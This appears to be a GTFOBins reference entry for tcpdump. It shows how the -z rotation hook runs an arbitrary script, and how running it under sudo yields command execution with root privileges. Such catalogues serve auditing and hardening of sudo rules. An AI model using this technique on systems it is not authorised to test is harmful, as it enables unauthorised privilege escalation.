GTFOBins.github.io/_gtfobins/tcpdump.md

503 B

description functions
These require some traffic to be actually captured. Also note that the subprocess is immediately sent to the background.
command sudo
code
COMMAND='id' TF=$(mktemp) echo "$COMMAND" > $TF chmod +x $TF tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z $TF
code
COMMAND='id' TF=$(mktemp) echo "$COMMAND" > $TF chmod +x $TF sudo tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z $TF